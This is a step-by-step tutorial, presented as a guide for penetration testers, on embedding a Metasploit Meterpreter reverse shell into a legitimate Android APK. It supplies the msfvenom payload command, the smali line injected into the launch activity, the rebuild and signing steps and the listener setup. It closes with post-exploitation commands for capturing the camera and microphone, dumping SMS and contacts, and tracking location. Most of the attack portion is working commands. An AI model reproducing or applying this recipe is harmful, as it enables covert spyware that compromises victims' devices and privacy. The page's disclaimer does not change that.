Embedding a Reverse Shell in Any Android APK: A Comprehensive Guide for Penetration Testers
Legal Disclaimer
This article is intended for ethical hacking, penetration testing, and educational purposes only. Do not use any of the techniques described herein without explicit permission on systems or devices you do not own. Misuse may be considered a criminal offense.
Overview
In Android penetration testing, it's often necessary to simulate real-world attacks to test the resilience of applications and users. One powerful technique is embedding a reverse shell into a legitimate APK, effectively turning any benign app into a trojanized payload.
This guide walks you through the entire process — from decompiling an APK and injecting a Metasploit payload, to signing and deploying it, then capturing the reverse shell.
Required Tools
Install the following on your Linux environment (Kali Linux is used here):
sudo apt update
sudo apt install apktool aapt openjdk-17-jdk zipalign
- apktool – Disassemble and reassemble APKs.
- aapt – Extract Android manifest and metadata.
- keytool & jarsigner – Generate keystores and sign the APK.
- zipalign – Aligns the APK for proper installation (optional but recommended).
- Metasploit Framework – Generate payloads and handle connections.
Step-by-Step Instructions
Step 1: Generate the Payload APK with msfvenom
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -o payload.apk
Explanation:
-p: Payload type.LHOST: Attacker’s IP address.LPORT: Listening port.-o: Output file.
This creates a malicious APK named payload.apk that contains the Meterpreter payload.
Step 2: Decompile Both APKs
Disassemble the legitimate app and the payload using apktool.
apktool d appname.apk -o original_app
apktool d payload.apk -o payload_app
Sample Output:
I: Using Apktool 2.x.x...
I: Decoding AndroidManifest.xml...
I: Copying assets and smali classes...
Step 3: Identify the Launchable Activity
To inject the payload where the app starts, locate the main activity using aapt.
aapt dump badging appname.apk | grep launchable-activity
Output:
launchable-activity: name='com.example.app.MainActivity'
Take note of the activity name. This indicates which smali file to modify.
Step 4: Edit the Launch Activity (onCreate())
Navigate to the directory containing the identified smali file:
cd original_app/smali/com/example/app/
nano MainActivity.smali
Locate the method:
.method protected onCreate(Landroid/os/Bundle;)V
Directly after the super.onCreate(...) line, add:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Purpose: This line initiates the Meterpreter payload when the app launches.
Step 5: Copy the Malicious Payload
Copy the payload classes from the payload_app into the legitimate application’s structure:
cp -r payload_app/smali/com/metasploit original_app/smali/com/
This ensures the injected code works during runtime.
Step 6: Rebuild the APK
Use apktool to recompile the modified app.
apktool b original_app -o evil_app.apk
Expected Output:
I: Smaling smali folder into classes.dex...
I: Building resources...
I: Building apk file...
Step 7: Sign the APK
Unsigned APKs will not install on Android devices. Generate and use a keystore to sign the APK.
Generate Keystore (if needed):
keytool -genkey -v -keystore my-release-key.keystore \
-alias myalias -keyalg RSA -keysize 2048 -validity 10000
Follow the prompts to create the keystore.
Sign the APK:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 \
-keystore my-release-key.keystore evil_app.apk myalias
(Optional) Optimize with zipalign:
zipalign -v 4 evil_app.apk evil_app_aligned.apk
Step 8: Set Up the Metasploit Listener
Open Metasploit and configure the handler:
msfconsole
Configure the payload handler:
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 4444
exploit
Step 9: Deploy and Install APK
Transfer the APK to a testing device and install it:
adb install evil_app.apk
Once the app is launched, you’ll receive a Meterpreter session in your Metasploit console.
Post-Exploitation with Meterpreter
Here are useful commands once you have a Meterpreter session on the Android device:
| Command | Function |
|---|---|
sysinfo |
Display OS and device information |
getuid |
Show current user identity |
webcam_snap |
Take a picture using the device camera |
record_mic |
Record audio from the device microphone |
dump_sms |
Retrieve SMS messages |
dump_contacts |
Export contact list |
geolocate |
Obtain GPS coordinates |
app_list |
List all installed applications |
shell |
Access device shell |
upload, download |
Transfer files to and from the device |
cd, ls |
Navigate the Android file system |
Conclusion
Embedding a reverse shell in an APK is a powerful method that highlights how attackers can Trojanize legitimate mobile applications. This technique is invaluable in testing mobile security postures and training blue teams to recognize real-world threat vectors.
Use this knowledge strictly for authorized and ethical purposes. Always notify clients and adhere to penetration testing guidelines.